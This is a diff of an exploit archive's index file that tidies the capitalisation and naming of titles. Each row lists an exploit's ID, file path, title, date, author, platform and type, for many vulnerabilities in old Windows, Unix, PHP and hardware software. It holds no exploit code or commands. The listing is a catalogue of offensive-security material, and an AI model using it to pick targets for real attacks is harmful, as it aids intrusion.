Service",2012-07-04,"Soroush Dalili",windows,dos,0 19576,platforms/windows/remote/19576.rb,"IBM Rational ClearQuest CQOle - Remote Code Execution",2012-07-05,Metasploit,windows,remote,0 @@ -16960,51 +16961,51 @@ id,file,description,date,author,platform,type,port 19588,platforms/windows/remote/19588.c,"IBM HomePagePrint 1.0 7 - Buffer Overflow",1999-11-02,UNYUN,windows,remote,0 19589,platforms/windows/remote/19589.txt,"Avirt Gateway Suite 3.3/3.3 a/3.5 - Directory Creation",1999-10-31,"Jesús López de Aguileta",windows,remote,0 19590,platforms/unix/local/19590.c,"Hylafax Hylafax 4.0.2 - Buffer Overflow",1999-11-03,"Brock Tellier",unix,local,0 -19591,platforms/windows/remote/19591.txt,"Microsoft Internet Explorer 4.0/5.0 / Outlook 98 - window.open Redirect",1999-11-04,"Georgi Guninski",windows,remote,0 +19591,platforms/windows/remote/19591.txt,"Microsoft Internet Explorer 4/5 / Outlook 98 - window.open Redirect",1999-11-04,"Georgi Guninski",windows,remote,0 19592,platforms/windows/remote/19592.asm,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (1)",1999-11-04,"dark spyrit",windows,remote,0 19593,platforms/windows/remote/19593.c,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (2)",1999-11-04,"dark spyrit",windows,remote,0 19594,platforms/windows/local/19594.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Spoolss.exe DLL Insertion",1999-11-04,"Marc of eEye",windows,local,0 19595,platforms/windows/remote/19595.c,"Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilities",1999-11-03,Kerb,windows,remote,0 19596,platforms/windows/dos/19596.txt,"Byte Fusion BFTelnet 1.1 - Long Username Denial of Service",1999-11-03,"Ussr Labs",windows,dos,0 -19597,platforms/php/webapps/19597.txt,"GuestBook Scripts PHP 1.5 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 +19597,platforms/php/webapps/19597.txt,"Guestbook Scripts PHP 1.5 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19598,platforms/php/webapps/19598.txt,"Freeside SelfService CGI/API 2.3.3 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19600,platforms/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 -19603,platforms/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5.0 / Outlook 2000 0/98 0/Express 4.x - ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 +19603,platforms/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution",2012-07-31,Metasploit,windows,remote,8082 30094,platforms/php/webapps/30094.txt,"DGNews 2.1 - footer.php Cross-Site Scripting",2007-05-28,"Jesper Jurcenoks",php,webapps,0 20120,platforms/windows/remote/20120.pl,"httpdx 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,windows,remote,0 19605,platforms/linux/dos/19605.c,"Linux Kernel 3.2.24 - 'fs/eventpoll.c' Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",linux,dos,0 19903,platforms/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 - DBMan Information Leakage",2000-05-05,"Black Watch Labs",multiple,remote,0 -19607,platforms/windows/remote/19607.c,"Windows 95/98 - UNC Buffer Overflow (1)",1999-11-09,UNYUN,windows,remote,0 -19608,platforms/windows/remote/19608.c,"Windows 95/98 - UNC Buffer Overflow (2)",1999-11-09,UNYUN,windows,remote,0 +19607,platforms/windows/remote/19607.c,"Microsoft Windows 95/98 - UNC Buffer Overflow (1)",1999-11-09,UNYUN,windows,remote,0 +19608,platforms/windows/remote/19608.c,"Microsoft Windows 95/98 - UNC Buffer Overflow (2)",1999-11-09,UNYUN,windows,remote,0 19609,platforms/freebsd/local/19609.txt,"Muhammad M. Saggaf Seyon 2.14b - Relative Path",1999-11-08,"Shawn Hillis",freebsd,local,0 19610,platforms/windows/local/19610.c,"Irfan Skiljan IrfanView32 3.0.7 - Image File Buffer Overflow",1999-11-09,UNYUN,windows,local,0 19611,platforms/windows/remote/19611.txt,"TransSoft Broker FTP Server 3.0 x/4.0 - User Name Buffer Overflow",1999-11-08,"Ussr Labs",windows,remote,0 -19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 - Long HELO Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0 +19612,platforms/windows/remote/19612.pl,"Trend Micro Interscan VirusWall 3.2.3/3.3 - Long HELO Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0 19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 - C&C Server Buffer Overflow",2012-07-06,Metasploit,windows,remote,3460 -19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 - Long HELO Buffer Overflow (2)",1999-11-07,"dark spyrit",windows,remote,0 +19614,platforms/windows/remote/19614.asm,"Trend Micro Interscan VirusWall 3.2.3/3.3 - Long HELO Buffer Overflow (2)",1999-11-07,"dark spyrit",windows,remote,0 19615,platforms/unix/dos/19615.c,"ISC BIND 8.2.2 / IRIX 6.5.17 / Solaris 7.0 - NXT Overflow / Denial of Service",1999-11-10,"ADM Crew",unix,dos,0 19616,platforms/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow)",1999-11-08,Interrupt,windows,dos,0 19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 - POP Buffer Overflow",1999-11-11,"Ussr Labs",windows,remote,0 -19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5.0 Media Player - ActiveX Error Message",1999-11-14,"Georgi Guninski",windows,remote,0 +19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5 Media Player - ActiveX Error Message",1999-11-14,"Georgi Guninski",windows,remote,0 19619,platforms/windows/dos/19619.txt,"QPC Software QVT Term 4.3/QVT/Net 4.3 Suite FTP Server - Denial of Service",1999-11-10,"Ussr Labs",windows,dos,0 19620,platforms/unix/remote/19620.txt,"Matt Wright - FormHandler.cgi 2.0 Reply Attachment",1999-11-16,m4rcyS,unix,remote,0 19621,platforms/windows/remote/19621.c,"Admiral Systems EmailClub 1.0.0.5 - Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19622,platforms/windows/remote/19622.c,"Antelope Software W4-Server 2.6 a/Win32 - Cgitest.exe Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 -19623,platforms/windows/remote/19623.c,"International TeleCommunications WebBBS 2.13 - login & password Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 +19623,platforms/windows/remote/19623.c,"International TeleCommunications WebBBS 2.13 - login & Password Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19624,platforms/windows/dos/19624.txt,"Gene6 G6 FTP Server 2.0 - Buffer Overflow Denial of Service",1999-11-17,"Ussr Labs",windows,dos,0 19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 - SEH Overflow",2012-07-06,"motaz reda",windows,remote,888 19626,platforms/php/webapps/19626.txt,"sflog! 1.00 - Multiple Vulnerabilities",2012-07-06,dun,php,webapps,0 19628,platforms/php/webapps/19628.txt,"Event Script PHP 1.1 CMS - Multiple Vulnerabilities",2012-07-06,Vulnerability-Lab,php,webapps,0 19629,platforms/php/webapps/19629.txt,"Webmatic 3.1.1 - Blind SQL Injection",2012-07-06,"High-Tech Bridge SA",php,webapps,0 -19630,platforms/php/webapps/19630.rb,"Tiki Wiki 8.3 - unserialize() PHP Code Execution",2012-07-09,Metasploit,php,webapps,0 +19630,platforms/php/webapps/19630.rb,"Tiki Wiki 8.3 - Unserialize() PHP Code Execution",2012-07-09,Metasploit,php,webapps,0 19631,platforms/php/webapps/19631.rb,"Basilic 1.5.14 - diff.php Arbitrary Command Execution",2012-07-09,Metasploit,php,webapps,0 -19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink Webserver - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",hardware,remote,0 -19633,platforms/windows/local/19633.txt,"Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 - Riched Buffer Overflow",1999-11-17,"Pauli Ojanpera",windows,local,0 +19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",hardware,remote,0 +19633,platforms/windows/local/19633.txt,"Microsoft Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 - Riched Buffer Overflow",1999-11-17,"Pauli Ojanpera",windows,local,0 19634,platforms/linux/remote/19634.c,"ETL Delegate 5.9.x / 6.0.x - Buffer Overflow",1999-11-13,scut,linux,remote,0 19635,platforms/solaris/dos/19635.c,"Sun Solaris 7.0 - rpc.ttdbserver Denial of Service",1999-11-19,"Elias Levy",solaris,dos,0 19636,platforms/windows/dos/19636.txt,"Dick Lin ZetaMail 2.1 - Login Denial of Service",1999-11-18,"Ussr Labs",windows,dos,0 -19637,platforms/windows/remote/19637.txt,"Microsoft Internet Explorer 5.0 for Windows 2000/95/98/NT 4 - XML HTTP Redirect",1999-11-22,"Georgi Guninksi",windows,remote,0 +19637,platforms/windows/remote/19637.txt,"Microsoft Internet Explorer 5 (Windows 2000/95/98/NT 4) - XML HTTP Redirect",1999-11-22,"Georgi Guninksi",windows,remote,0 19638,platforms/windows/dos/19638.c,"Microsoft SQL Server 7.0/7.0 SP1 - NULL Data Denial of Service",1999-11-19,"Kevork Belian",windows,dos,0 19639,platforms/windows/dos/19639.txt,"Alt-N MDaemon 2.8.5 - WebConfig Overflow Denial of Service",1999-11-24,"Ussr Labs",windows,dos,0 19640,platforms/windows/dos/19640.txt,"Alt-N WorldClient Pro 2.0.0.0/2.0.1.0/Standard 2.0.0.0 - Long URL Denial of Service",1999-11-26,"Ussr Labs",windows,dos,0 @@ -17024,7 +17025,7 @@ id,file,description,date,author,platform,type,port 19654,platforms/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin'",1998-12-02,"Brock Tellier",sco,local,0 19655,platforms/linux/local/19655.txt,"RSA Security RSAREF 2.0 - Buffer Overflow",1999-12-14,"Alberto Solino",linux,local,0 19656,platforms/sco/local/19656.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'xauto' Buffer Overflow",1999-12-03,"Brock Tellier",sco,local,0 -19657,platforms/sco/local/19657.txt,"SCO Unixware 7.1 - '/var/mail' permissions",1999-12-03,"Brock Tellier",sco,local,0 +19657,platforms/sco/local/19657.txt,"SCO Unixware 7.1 - '/var/mail' Permissions",1999-12-03,"Brock Tellier",sco,local,0 19658,platforms/sco/local/19658.txt,"SCO Unixware 7.1 - 'pkg' commands",1999-12-03,"Brock Tellier",sco,local,0 19659,platforms/sco/local/19659.sh,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink",1999-12-03,"Brock Tellier",sco,local,0 19660,platforms/sco/local/19660.c,"SCO Unixware 7.1 pkgcat - Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 @@ -17032,7 +17033,7 @@ id,file,description,date,author,platform,type,port 19662,platforms/windows/remote/19662.txt,"Microsoft Internet Explorer 4.1/5.0/4.0.1 - Subframe Spoofing",1999-11-30,"Georgi Guninski",windows,remote,0 19663,platforms/solaris/remote/19663.c,"Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - (print_domain_name) Buffer Overflow",1999-12-07,K2,solaris,remote,0 19664,platforms/windows/dos/19664.txt,"Cat Soft Serv-U 2.5a - Server SITE PASS Denial of Service",1999-12-02,"Ussr Labs",windows,dos,0 -19665,platforms/windows/local/19665.txt,"Microsoft Internet Explorer 5.0 - vnd.ms.radio URL",1999-12-06,"Jeremy Kothe",windows,local,0 +19665,platforms/windows/local/19665.txt,"Microsoft Internet Explorer 5 - vnd.ms.radio URL",1999-12-06,"Jeremy Kothe",windows,local,0 19666,platforms/windows/dos/19666.txt,"GoodTech Telnet Server NT 2.2.1 - Denial of Service",1999-12-06,"Ussr Labs",windows,dos,0 19667,platforms/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Buffer Overflow",1999-12-09,"Amanda Woodward",multiple,remote,0 19668,platforms/solaris/remote/19668.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (1)",1999-06-24,"Cheez Whiz",solaris,remote,0 @@ -17070,14 +17071,14 @@ id,file,description,date,author,platform,type,port 19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1a - GET Buffer Overflow",1999-12-31,"Brock Tellier",unixware,remote,0 19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 - midikeys/soundplayer",1999-12-31,Loneguard,irix,local,0 19707,platforms/unix/local/19707.sh,"Ascend CascadeView/UX 1.0 tftpd - Symbolic Link",1999-12-31,Loneguard,unix,local,0 -19708,platforms/php/remote/19708.php,"PHP 3.0.13 - 'safe_mode' Failure",2000-01-04,"Kristian Koehntopp",php,remote,0 +19708,platforms/php/remote/19708.php,"PHP 3.0.13 - 'Safe_mode' Failure",2000-01-04,"Kristian Koehntopp",php,remote,0 19709,platforms/linux/local/19709.sh,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path Exploit (1)",2000-01-04,dildog,linux,local,0 19710,platforms/linux/local/19710.c,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path Exploit (2)",2000-03-15,"Elias Levy",linux,local,0 19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor status.cgi Denial of Service",2000-01-05,"Ussr Labs",windows,dos,0 19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE",2000-01-04,anonymous,multiple,remote,0 19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - search.cgi Directory Traversal",2000-01-03,"k0ad k1d",cgi,remote,0 40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution",2016-07-11,Metasploit,ruby,remote,80 -19715,platforms/php/webapps/19715.txt,"Wordpress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 +19715,platforms/php/webapps/19715.txt,"WordPress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0 19717,platforms/java/remote/19717.rb,"Java Applet - Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,Metasploit,java,remote,0 19718,platforms/windows/remote/19718.rb,"AdminStudio - LaunchHelp.dll ActiveX Arbitrary Code Execution",2012-07-11,Metasploit,windows,remote,0 @@ -17093,18 +17094,18 @@ id,file,description,date,author,platform,type,port 19728,platforms/windows/local/19728.txt,"Microsoft Systems Management Server 2.0 - Default Permissions",1999-12-29,"Frank Monroe",windows,local,0 19729,platforms/linux/remote/19729.c,"Qualcomm qpopper 3.0 - 'LIST' Buffer Overflow",2000-01-10,Zhodiac,linux,remote,0 19730,platforms/windows/remote/19730.c,"A-V Tronics InetServ 3.0 - WebMail Long GET Request",2000-01-17,"Greg Hoglund",windows,remote,0 -19731,platforms/windows/remote/19731.c,"Microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal",2000-01-26,fredrik.widlund,windows,remote,0 +19731,platforms/windows/remote/19731.c,"Microsoft Index Server 2.0 / Indexing Services (Windows 2000) - Directory Traversal",2000-01-26,fredrik.widlund,windows,remote,0 19732,platforms/multiple/remote/19732.html,"Check Point Software Firewall-1 3.0 Script - Tag Checking Bypass",2000-01-29,"Arne Vidstrom",multiple,remote,0 19733,platforms/windows/local/19733.txt,"McAfee 4.0 / Network Associates for Windows NT 4.0.2/4.0.3 a / Norton AntiVirus 2000 - Recycle Bin Exclusion",1999-12-22,"Neil Bortnak",windows,local,0 19734,platforms/windows/remote/19734.java,"Microsoft Virtual Machine 2000 - Series/3000 Series getSystemResource",2000-01-31,"Hiromitsu Takagi",windows,remote,0 19735,platforms/linux/local/19735.txt,"Debian Linux 2.1 - apcd Symlink",2000-02-01,anonymous,linux,local,0 19889,platforms/windows/remote/19889.c,"Microsoft Windows 95/98 - NetBIOS NULL Name",2000-05-02,"rain forest puppy",windows,remote,0 19737,platforms/windows/remote/19737.c,"H. Nomura Tiny FTPDaemon 0.52 - Multiple Buffer Overflow Vulnerabilities",2000-02-01,UNYUN,windows,remote,0 -19738,platforms/windows/remote/19738.txt,"Microsoft Outlook Express 5 - Javascript Email Access",2000-02-01,"Georgi Guninski",windows,remote,0 +19738,platforms/windows/remote/19738.txt,"Microsoft Outlook Express 5 - JavaScript Email Access",2000-02-01,"Georgi Guninski",windows,remote,0 19739,platforms/windows/local/19739.txt,"Microsoft Windows NT 4.0 - Recycle Bin Pre-created Folder",2000-02-01,"Arne Vidstron and Nobuo Miwa",windows,local,0 19740,platforms/windows/dos/19740.c,"Jgaa WarFTPd 1.66 x4s/1.67-3 - (CWD/MKD) Denial of Service",2000-02-03,crc,windows,dos,0 19741,platforms/cgi/remote/19741.pl,"Wired Community Software WWWThreads 5.0 - SQL Command Input",2000-02-03,"rain forest puppy",cgi,remote,0 -19742,platforms/multiple/remote/19742.txt,"Microsoft iis 3.0/4.0 / Microsoft index server 2.0 - Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0 +19742,platforms/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft index server 2.0 - Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0 19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U 2.5/a/b / Windows 2000/95/98/NT 4.0 - Shortcut",2000-02-04,"Ussr Labs",windows,remote,0 19744,platforms/novell/dos/19744.txt,"Novell Groupwise Enhancement Pack 5.5 Enhancement Pack - Denial of Service",2000-02-07,"Adam Gray",novell,dos,0 19745,platforms/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 Beta - Pipe",2000-02-04,"Iain Wade",cgi,remote,0 @@ -17115,7 +17116,7 @@ id,file,description,date,author,platform,type,port 19750,platforms/multiple/dos/19750.sh,"Netopia Timbuktu Pro Remote Control 2.0/5.2.1 - Denial of Service",2000-02-11,eth0,multiple,dos,0 19751,platforms/multiple/remote/19751.txt,"Ascom COLTSOHO / Brocade Fabric OS / MatchBox / Win98/NT4 / Solaris / Xyplex - SNMP World Writeable Community",2000-02-15,"Michal Zalewski",multiple,remote,0 19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 - ARCserver /tmp symlink",2000-02-15,"Shawn Bracken",sco,local,0 -19753,platforms/windows/remote/19753.txt,"Microsoft frontpage personal webserver 1.0/personal Web server 4.0 - Directory Traversal",1996-01-17,kiborg,windows,remote,0 +19753,platforms/windows/remote/19753.txt,"Microsoft FrontPage personal WebServer 1.0/personal Web server 4.0 - Directory Traversal",1996-01-17,kiborg,windows,remote,0 19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - autorun.inf",2000-02-18,"Eric Stevens",windows,local,0 19755,platforms/windows/dos/19755.txt,"Pragma Systems InterAccess TelnetD Server 4.0 Build 4 - Buffer Overflow",2000-02-21,"Ussr Labs",windows,dos,0 19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu - Exploit",2000-02-19,anonymous,freebsd,local,0 @@ -17150,20 +17151,20 @@ id,file,description,date,author,platform,type,port 19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0 / SGI IRIX 6.5.x - fname",2000-03-05,rpc,irix,remote,0 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Buffer Overflow",2000-03-06,dildog,windows,local,0 19790,platforms/php/webapps/19790.txt,"webpagetest 2.6 - Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0 -19791,platforms/php/webapps/19791.txt,"Wordpress Resume Submissions & Job Postings 2.5.1 Plugin - Unrestricted File Upload",2012-07-13,"Chris Kellum",php,webapps,0 -19792,platforms/php/webapps/19792.txt,"Joomla KISS Advertiser - Remote File & Bypass Upload",2012-07-13,D4NB4R,php,webapps,0 +19791,platforms/php/webapps/19791.txt,"WordPress Resume Submissions & Job Postings 2.5.1 Plugin - Unrestricted File Upload",2012-07-13,"Chris Kellum",php,webapps,0 +19792,platforms/php/webapps/19792.txt,"Joomla KISS Advertiser - Remote File / Bypass Upload",2012-07-13,D4NB4R,php,webapps,0 19830,platforms/windows/remote/19830.txt,"Microsoft Index Server 2.0 - '%20' ASP Source Disclosure",2000-03-31,"David Litchfield",windows,remote,0 19794,platforms/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer - Exploit",2000-03-05,"Keyser Soze",linux,local,0 19795,platforms/cgi/remote/19795.txt,"Caldera OpenLinux 2.3 - rpm_query CGI",2000-03-05,harikiri,cgi,remote,0 19796,platforms/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",multiple,local,0 19797,platforms/unix/remote/19797.txt,"Sun StarOffice 5.1 - Arbitrary File Read",2000-03-09,"Vanja Hrustic",unix,remote,0 19798,platforms/windows/local/19798.txt,"Microsoft Windows NT 4.0 - User Shell Folders",2000-03-09,anonymous,windows,local,0 -19799,platforms/windows/dos/19799.txt,"Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Service",2000-03-04,anonymous,windows,dos,0 +19799,platforms/windows/dos/19799.txt,"Microsoft Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Service",2000-03-04,anonymous,windows,dos,0 19800,platforms/multiple/remote/19800.c,"Check Point Software Firewall-1 3.0/1 4.0 / Cisco PIX Firewall 4.x/5.x - 'ALG' Client",2000-03-10,"Dug Song",multiple,remote,0 19801,platforms/linux/remote/19801.c,"Michael Sandrof IrcII 4.4-7 - Buffer Overflow",2000-03-10,bladi,linux,remote,0 19802,platforms/linux/local/19802.c,"Sam Hawker wmcdplay 1.0 beta1-2 - Buffer Overflow (1)",2000-03-11,Krahmer,linux,local,0 19803,platforms/linux/local/19803.txt,"Sam Hawker wmcdplay 1.0 beta1-2 - Buffer Overflow (2)",2000-03-13,"Larry W. Cashdolla",linux,local,0 -19804,platforms/linux/local/19804.pl,"AT Computing atsar_linux 1.4 - File Manipulation",2000-03-11,"S. Krahmer",linux,local,0 +19804,platforms/linux/local/19804.pl,"AT Computing atsar_linux 1.4 - File manipulation",2000-03-11,"S. Krahmer",linux,local,0 19805,platforms/windows/remote/19805.txt,"GameHouse dldisplay - ActiveX control 0 / Real Server 5.0/7.0 Internal IP Address Disclosure",2000-03-08,tschweikle,windows,remote,0 19806,platforms/windows/dos/19806.c,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (1)",2000-03-14,"Ussr Labs",windows,dos,0 19807,platforms/windows/dos/19807.txt,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (2)",2000-03-14,"Ussr Labs",windows,dos,0 @@ -17180,7 +17181,7 @@ id,file,description,date,author,platform,type,port 19818,platforms/linux/dos/19818.c,"Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,dos,0 19819,platforms/windows/remote/19819.txt,"GeoCel WindMail 3.0 - Remote File Read",2000-03-27,"Quan Peng",windows,remote,0 19820,platforms/windows/dos/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 - Denial of Service",2000-03-25,"Presto Chango",windows,dos,0 -19821,platforms/multiple/local/19821.c,"Citrix MetaFrame 1.0/1.8 - Weak Encryption",2000-03-29,"Dug Song",multiple,local,0 +19821,platforms/multiple/local/19821.c,"Citrix Metaframe 1.0/1.8 - Weak Encryption",2000-03-29,"Dug Song",multiple,local,0 19822,platforms/irix/remote/19822.c,"SGI IRIX 5.x/6.x - Objectserver",2000-03-29,"Last Stage of Delirium",irix,remote,0 19823,platforms/unix/local/19823.txt,"Standard & Poors ComStock 4.2.4 - Machine Vulnerabilities",2000-03-24,kadokev,unix,local,0 19824,platforms/multiple/remote/19824.txt,"Microsoft IIS 4.0 - UNC Mapped Virtual Host",2000-03-30,"Adam Coyne",multiple,remote,0 @@ -17220,8 +17221,8 @@ id,file,description,date,author,platform,type,port 19905,platforms/unix/remote/19905.pl,"John Donoghue Knapster 0.9/1.3.8 - File Access",2000-05-13,no_maam,unix,remote,0 19904,platforms/unix/local/19904.txt,"Intel Corporation NetStructure 7110 - Undocumented Password",2000-05-08,"Stake Inc",unix,local,0 19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras - Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0 -19960,platforms/windows/dos/19960.txt,"Oracle Outside-In - .FPX File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 -19862,platforms/php/webapps/19862.pl,"Wordpress Diary/Notebook Site5 Theme - Email Spoofing",2012-07-16,bwall,php,webapps,0 +19960,platforms/windows/dos/19960.txt,"Oracle Outside-In - '.FPX' File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 +19862,platforms/php/webapps/19862.pl,"WordPress Diary/Notebook Site5 Theme - Email Spoofing",2012-07-16,bwall,php,webapps,0 19863,platforms/php/webapps/19863.txt,"CakePHP 2.x-2.2.0-RC2 - XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0 19864,platforms/php/webapps/19864.txt,"VamCart 0.9 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19865,platforms/php/webapps/19865.txt,"PBBoard 2.1.4 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 @@ -17260,7 +17261,7 @@ id,file,description,date,author,platform,type,port 19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 - Denial of Service",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0 19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 - pam_console",2000-05-03,"Michal Zalewski",linux,local,0 19901,platforms/hardware/remote/19901.txt,"Netopia R-series routers 4.6.2 - Exploit",2000-05-16,"Stephen Friedl",hardware,remote,0 -20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - (products_map.php symb parameter) Cross-Site Scripting",2012-07-21,muts,php,webapps,0 +20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - (products_map.php symb Parameter) Cross-Site Scripting",2012-07-21,muts,php,webapps,0 19906,platforms/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 - Environmental Variables Disclosure",2000-05-10,"Black Watch Labs",multiple,remote,0 19907,platforms/windows/dos/19907.txt,"Microsoft IIS 4.0/5.0 - Malformed File Extension Denial of Service",2000-05-11,"Ussr Labs",windows,dos,0 19908,platforms/windows/remote/19908.txt,"Microsoft IIS 4.0/5.0 - Malformed Filename Request",2000-05-11,"Cerberus Security Team",windows,remote,0 @@ -17286,7 +17287,7 @@ id,file,description,date,author,platform,type,port 19928,platforms/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 - Filetype",2000-05-13,http-equiv,windows,remote,0 19965,platforms/multiple/dos/19965.txt,"HP JetAdmin 6.0 - Printing Denial of Service",2000-05-24,"Ussr Labs",multiple,dos,0 19966,platforms/linux/remote/19966.c,"Marty Bochane MDBms 0.9 - xbx Buffer Overflow",2000-05-24,"HaCk-13 TeaM",linux,remote,0 -19930,platforms/windows/local/19930.rb,"Windows - Escalate Task Scheduler XML Privilege Escalation",2012-07-19,Metasploit,windows,local,0 +19930,platforms/windows/local/19930.rb,"Microsoft Windows - Escalate Task Scheduler XML Privilege Escalation",2012-07-19,Metasploit,windows,local,0 19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 - Buffer Overflow",2012-07-19,Metasploit,windows,remote,998 19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 - Buffer Overflow",2012-07-19,Metasploit,windows,remote,998 19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - 'Sendpage' Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local,0 @@ -17302,7 +17303,7 @@ id,file,description,date,author,platform,type,port 19946,platforms/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - /usr/tmp/ Symlink",2000-04-21,anonymous,linux,local,0 19947,platforms/linux/remote/19947.c,"gdm 1.0.x/2.0.x BETA/2.2.0 - XDMCP Buffer Overflow (1)",2000-05-22,"Chris Evans",linux,remote,0 19948,platforms/linux/remote/19948.c,"gdm 1.0.x/2.0.x BETA/2.2.0 - XDMCP Buffer Overflow (2)",2000-05-22,AbraxaS,linux,remote,0 -19949,platforms/irix/remote/19949.c,"Gauntlet Firewall 4.1/4.2/5.0 / 